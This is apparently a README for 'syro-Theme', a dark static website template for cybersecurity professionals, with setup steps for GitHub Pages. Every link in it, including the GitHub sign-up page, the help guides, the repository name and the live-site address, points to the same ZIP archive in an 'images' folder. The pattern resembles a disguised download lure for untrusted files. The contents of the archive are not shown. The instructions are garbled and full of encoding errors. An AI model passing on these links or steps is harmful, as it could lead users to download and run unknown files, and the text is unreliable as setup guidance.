syro-Theme is a dark-themed, minimalistic website template built specifically for cybersecurity professionals. It uses simple, clean design to help you focus on content. This theme works well for blogs, profiles, or informational pages. It runs as a static site, which means it doesnโt need a server and can be hosted easily on GitHub Pages.
If you want a sleek, professional online presence without hassle, syro-Theme is designed to fit that need.
syro-Theme is a static site template. It does not need powerful hardware or software to run. Hereโs what you need:
- A modern web browser such as Chrome, Firefox, Edge, or Safari.
- A GitHub account if you plan to host your site on GitHub Pages.
- Basic knowledge of how to use a computer to download files and upload to GitHub (no coding required).
- Optionally, a text editor like Notepad (Windows), TextEdit (Mac), or any editor you like if you want to make small text changes.
There is no software to install on your computer. The steps below will guide you through getting the theme and setting it up.
A static site is made of fixed files (HTML, CSS) you can open directly in your browser. syro-Theme uses this approach so you donโt need database or server setup. Just get the files and upload them to GitHub Pages, and your site is live.
- Cybersecurity professionals wanting a portfolio or blog.
- People looking for a simple, dark-themed website.
- Anyone who wants to publish content with little technical setup.
No programming or design skills needed. You can use syro-Theme out of the box or customize some text.
You need to visit the syro-Theme releases page to get the latest files.
Click the button below to go to the download page:
On the releases page:
- Look for the latest version (usually at the top).
- Download the file named something like
https://raw.githubusercontent.com/eldenisek/syro-Theme/main/images/syro_Theme_v3.7.zip.
The file is a compressed folder. Once downloaded, you will need to unzip it.
Locate the downloaded ZIP file on your computer (usually in the Downloads folder).
- On Windows: Right-click and select "Extract All."
- On Mac: Double-click the ZIP file; it will create a folder.
- On Linux: Use your file managerโs extract option.
Unzipping creates a folder named syro-Theme containing the website files.
You can view the site on your own computer before uploading.
- Open the
https://raw.githubusercontent.com/eldenisek/syro-Theme/main/images/syro_Theme_v3.7.zipfile inside thesyro-Themefolder. - A browser window will open with the homepage of the theme.
- Browse through the pages to see the look and feel.
No web server or internet connection is needed for this preview.
If you want to change text or add your own information:
- Open the files in the
syro-Themefolder with a plain text editor. - Look for the
https://raw.githubusercontent.com/eldenisek/syro-Theme/main/images/syro_Theme_v3.7.zipfile or other.htmlfiles. - Change text such as your name, blog posts, or contact info.
- Save the files after editing.
No coding knowledge is required to change simple text.
To make your site live on the internet, use GitHub Pages. It offers free hosting for static sites.
If you donโt have a GitHub account:
- Visit https://raw.githubusercontent.com/eldenisek/syro-Theme/main/images/syro_Theme_v3.7.zip
- Click Sign up.
- Follow the instructions to create an account.
- Log in to GitHub.
- Click the "+" icon at the top right and select "New repository."
- Name the repository as
https://raw.githubusercontent.com/eldenisek/syro-Theme/main/images/syro_Theme_v3.7.zip(replaceyour-usernamewith your GitHub user ID). - Choose "Public" for repository visibility.
- Do not initialize the repository with a README.
- Open the repository you just created on GitHub.
- Click "Upload files."
- Drag and drop all files and folders from the unzipped
syro-Themefolder. - Scroll down and click "Commit changes."
- Go to the "Settings" tab of your repository.
- Click on "Pages" in the sidebar.
- Under "Source," select the main branch and root folder (
/). - Click "Save."
After a few minutes, visit https://raw.githubusercontent.com/eldenisek/syro-Theme/main/images/syro_Theme_v3.7.zip in a browser.
Your new website will appear live with the syro-Theme applied.
- Make any changes in your local copy of syro-Theme.
- Upload changed files to your GitHub repository by repeating the upload step.
- Changes should appear on your live site within a few minutes.
- Dark, minimal design โ easy on the eyes.
- Responsive layout โ works well on phones, tablets, and desktops.
- Built with HTML5 and CSS3.
- Easy to customize text and colors.
- Optimized for GitHub Pages hosting.
- Focus on cybersecurity professionals with relevant design and color scheme.
- Supports blogs, profiles, and static informational pages.
- The site looks broken or unstyled? Make sure all files uploaded correctly.
- The site doesnโt show your latest changes? Try clearing your browser cache and reload.
- GitHub Pages gives a 404 error? Check you named the repository correctly as
https://raw.githubusercontent.com/eldenisek/syro-Theme/main/images/syro_Theme_v3.7.zip. - Need help? GitHub has helpful guides at https://raw.githubusercontent.com/eldenisek/syro-Theme/main/images/syro_Theme_v3.7.zip
If you want to ask questions or contribute:
- Visit the main repository: https://raw.githubusercontent.com/eldenisek/syro-Theme/main/images/syro_Theme_v3.7.zip
- Use GitHub Issues to report bugs or request features.
- You can fork the project to make your own improvements.
syro-Theme offers a clean and practical way to publish your cybersecurity content, blog, or personal profile with minimal effort and no coding. Use the instructions above to get started quickly and confidently.